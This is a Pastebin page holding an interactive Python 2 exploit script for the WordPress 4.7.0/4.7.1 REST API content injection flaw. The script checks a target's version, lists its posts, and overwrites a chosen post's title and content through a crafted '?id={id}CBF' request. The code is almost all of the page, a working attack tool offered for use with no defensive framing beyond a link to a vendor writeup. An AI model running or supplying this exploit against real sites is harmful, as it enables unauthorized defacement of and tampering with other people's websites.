API tools faq
paste
doblej

wordpress 4.7.0 - 1 Json Bug

doblej
Jul 7th, 2017
258
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.73 KB | None | 0 0
raw download clone embed print report
  1. #! /usr/bin/env python
  2.  
  3. """
  4. Technical Explanation: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
  5. REST API Wordpress reference: https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
  6. Wordpress Version Affected: 4.7.0/4.7.1
  7.  
  8. 2017 - Coded by snoww0lf.
  9. """
  10. import re
  11. import json
  12. import urllib2
  13.  
  14. class WpContent:
  15.     def __init__(self, url):
  16.         self.__url = url
  17.         self.__response = urllib2.urlopen(self.__url).read()
  18.  
  19.     def get_api_wp(self):
  20.         return re.findall(r"https://api.w.org/' href='(.*)'", self.__response)[0]
  21.  
  22.     def get_wp_version(self):
  23.         check_version = re.findall(r'ver=(.*)"', self.__response)[0]
  24.         if check_version == "4.7" or check_version == "4.7.1":
  25.             check_version += " ( Maybe vulnerable to inject ) "
  26.         else:
  27.             check_version += " ( Maybe not vulnerable to inject ) "
  28.         return check_version
  29.  
  30.     def get_wp_post_information(self):
  31.         get_post = urllib2.urlopen(self.get_api_wp()+"wp/v2/posts").read()
  32.         load_info = json.loads(get_post)
  33.         collected_information = ""
  34.         for load in load_info:
  35.             collected_information += "[x] Post ID: {0}\n[x] Post Title: {1}\n[x] Post URL: {2}\n[x] Post Content: {3} [SNIPPET]\n\n".\
  36.             format(load['id'], load['title']['rendered'].encode("utf-8"), load['link'], load['content']['rendered'][:100].encode('utf-8'))
  37.         return collected_information
  38.  
  39.     def inject_content(self, id_content, title, content):
  40.         data = json.dumps({
  41.             'title':title,
  42.             'content':content
  43.             })
  44.         params = {'Content-Type':'application/json'}
  45.         full_url = self.get_api_wp() + "wp/v2/posts/{0}/?id={0}CBF".format(id_content)
  46.         req = urllib2.Request(full_url, data, params)
  47.         resp = urllib2.urlopen(req).read()
  48.         return resp
  49.  
  50. def main():
  51.     print("[X] WORDPRESS 4.7.0/4.7.1 CONTENT INJECTION EXPLOIT BY snoww0lf [X]\n")
  52.     while True:
  53.         url = raw_input("[x] Enter the URL: ")
  54.         print("[?] Please wait ...\n")
  55.         wpcontent = WpContent(url)
  56.         wp_version = wpcontent.get_wp_version().split()[0]
  57.         print("[x] Wordpress Version: {0} ".format(wp_version))
  58.         if(wp_version == "4.7" or wp_version == "4.7.1"):
  59.             select = raw_input("[x] It's affected version. It seems vulnerable, continue? [y/n] ").lower()
  60.             while(select != "y" and select != "n"):
  61.                 print("[x] Wrong selection! Try again.")
  62.                 select = raw_input("[x] Affected version. Seems vulnerable, continue? [y/n] ").lower()
  63.             print("\n")
  64.             if(select == "y"):
  65.                 print("[x] Parsing data information, please wait ...\n")
  66.                 wp_information = wpcontent.get_wp_post_information()
  67.                 print(wp_information)
  68.                 inp_id = input("[x] Enter ID Content that you want to overwrite: ")
  69.                 inp_title = raw_input("[x] Change title: ")
  70.                 print("\n")
  71.                 print("=> 1. Load data from file.")
  72.                 print("=> 2. Input data.")
  73.                 print("\n")
  74.                 mode = input("[x] Change content by [1/2] ? ")
  75.                 if mode == 1:
  76.                     dfile = raw_input("[x] Enter the filename: ")
  77.                     with open(dfile, 'r') as f:
  78.                         readf = f.readlines()
  79.                     print("[x] Exploit in progress ...\n")
  80.                     wpcontent.inject_content(inp_id, inp_title, ''.join(readf))
  81.                 else:
  82.                     inp_data = raw_input("[?] Input data: ")
  83.                     print("[x] Exploit in progress ...\n")
  84.                     wpcontent.inject_content(inp_id, inp_title, inp_data)
  85.                 print("[x] Update success!\n")
  86.                 cont = raw_input("[?] Continue ? [y/n] ").lower()
  87.                 while(cont != "y" and cont != "n"):
  88.                     print("[x] Wrong selection! Try again.")
  89.                     cont = raw_input("[?] Continue ? [y/n] ").lower()
  90.                 if cont == "n": break
  91.             else:
  92.                 break
  93.         else:
  94.             cont = raw_input("[?] Continue ? ").lower()
  95.             while(cont != "y" and cont != "n"):
  96.                 print("[x] Wrong selection! Try again.")
  97.                 cont = raw_input("[?] Continue ? ").lower()
  98.             if cont == "n": break
  99.  
  100. if __name__ == '__main__':
  101.     main()
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!